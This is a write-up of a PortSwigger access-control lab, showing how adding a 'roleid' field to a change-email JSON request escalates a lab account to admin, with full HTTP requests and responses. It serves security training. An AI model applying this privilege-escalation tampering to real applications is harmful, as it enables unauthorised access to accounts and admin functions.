User role can be modified in user profile

Introduction

Portswigger

Category: Access control vulnerabilities

Write-up date: 10/06/2025

Question: This lab has an admin panel at /admin. It's only accessible to logged-in users with a roleid of 2.

Solve the lab by accessing the admin panel and using it to delete the user carlos.

You can log in to your own account using the following credentials: wiener:peter

Point: APPRENTICE

Recon

Logged in using user wiener, the page redirect to /my-account. In here you have the function to change account email. Send a test email to server and the page post.

POST /my-account/change-email HTTP/2
Host: 0ac4009c04aba03c80a5351a00c300fb.web-security-academy.net
Cookie: session=redacted
Content-Length: 20
Accept-Language: en-US,en;q=0.9
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://0ac4009c04aba03c80a5351a00c300fb.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0ac4009c04aba03c80a5351a00c300fb.web-security-academy.net/my-account?id=wiener
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

{"email":"aa@a.com"}

Then the server response with

HTTP/2 302 Found
Location: /my-account
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 112

{
  "username": "wiener",
  "email": "aa@a.com",
  "apikey": "redacted",
  "roleid": 1
}

Look like the server response all the information off account. I wonder why...

Exploit

Try to submit request but this time add the roleid to the request json.

POST /my-account/change-email HTTP/2
Host: 0ac4009c04aba03c80a5351a00c300fb.web-security-academy.net
Cookie: session=redacted
Content-Length: 37
Accept-Language: en-US,en;q=0.9
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://0ac4009c04aba03c80a5351a00c300fb.web-security-academy.net
Referer: https://0ac4009c04aba03c80a5351a00c300fb.web-security-academy.net/my-account?id=wiener
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

{
    "email":"aa@a.com",
    "roleid": 2
}

The server response to the change and guess the one does change now, the roleid has changed, and we have access to admin panel.

HTTP/2 302 Found
Location: /my-account
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 112

{
  "username": "wiener",
  "email": "aa@a.com",
  "apikey": "redacted",
  "roleid": 2
}

Access the admin panel then delete user carlos to complete the lab.